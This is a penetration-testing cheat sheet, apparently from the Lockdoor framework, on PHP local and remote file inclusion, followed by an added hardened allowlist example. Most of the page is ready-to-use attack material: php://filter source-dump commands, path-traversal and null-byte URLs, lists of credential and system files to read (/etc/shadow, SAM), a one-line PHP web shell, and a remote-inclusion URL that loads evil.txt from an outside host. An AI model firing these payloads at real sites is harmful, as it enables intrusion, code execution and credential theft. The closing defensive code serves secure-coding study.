Lockdoor Framework

A Penetration Testing Framework

File Inclusion Vulnerabilities

fimap is a Python tool that automates the exploitation of LFI/RFI vulnerabilities found in PHP applications (think sqlmap, but for LFI): https://github.com/kurobeats/fimap

If a phpinfo() file is present, it is usually possible to get a shell. If you don't know the location of the phpinfo file, fimap can probe for it, or you could use a tool like OWASP DirBuster.

> include("lang/".$_COOKIE['lang']);
> include($_GET['page'].".php");

> curl -s \
> "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
> | grep -e '[^\ ]\{40,\}' | base64 -d

> http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php

> /etc/issue
> /proc/version
> /etc/profile
> /etc/passwd
> /etc/shadow
> /root/.bash_history
> /var/log/dmessage
> /var/mail/root
> /var/spool/cron/crontabs/root

> %SYSTEMROOT%\repair\system
> %SYSTEMROOT%\repair\SAM
> %WINDIR%\win.ini
> %SYSTEMDRIVE%\boot.ini
> %WINDIR%\Panther\sysprep.inf
> %WINDIR%\system32\config\AppEvent.Evt

> /etc/fstab
> /etc/master.passwd
> /etc/resolv.conf
> /etc/sudoers
> /etc/sysctl.conf

> http://$ip/index.php?page=/etc/passwd
> http://$ip/index.php?file=../../../../etc/passwd

> http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

> GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

> <?php echo shell_exec($_GET['cmd']);?>
> include($_REQUEST["file"].".php");


Remote File Inclusion

> http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt

> <?php echo shell_exec("ipconfig");?>
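
A hardened counterpart to the `include($_GET['page'].".php")` pattern shown on this page, as an added example that is not part of the original page or the Lockdoor project: the request value is used only as a key into an allowlist, so the traversal, `php://filter`, remote-URL and null-byte inputs listed above never reach `include`. The page names, the `resolve_page` helper and the temporary directory are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);
// Added example, not code from the original page. Page names and the
// temporary directory are constructed for the demonstration.

// Vulnerable pattern from this page, for comparison (not executed):
//   include($_GET['page'] . ".php");

// Allowlist: the only request values that ever map to a file on disk.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_page(string $requested, string $baseDir): ?string
{
    // Exact-key lookup: traversal, wrappers, URLs and NUL bytes never match.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: canonicalise and require the result to stay in $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed sandbox so the script runs offline from the CLI.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/home.php", "<?php echo 'home';");
file_put_contents("$dir/about.php", "<?php echo 'about';");

// Request values in the shapes listed on this page, plus one legitimate value.
$inputs = [
    'home',
    '/etc/passwd',
    '../../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=index',
    'http://192.168.10.5/evil.txt',
    "../../windows/system32/drivers/etc/hosts\0",
];
foreach ($inputs as $in) {
    // In a real handler: include $target when non-null, otherwise answer 404.
    $target = resolve_page($in, $dir);
    $shown = json_encode($in, JSON_UNESCAPED_SLASHES);
    printf("%-54s => %s\n", $shown, $target === null ? 'rejected' : 'include ' . basename($target));
}
```

Keep `allow_url_include` at its default of `Off` as well, so a remote URL cannot be included even if a path check is bypassed.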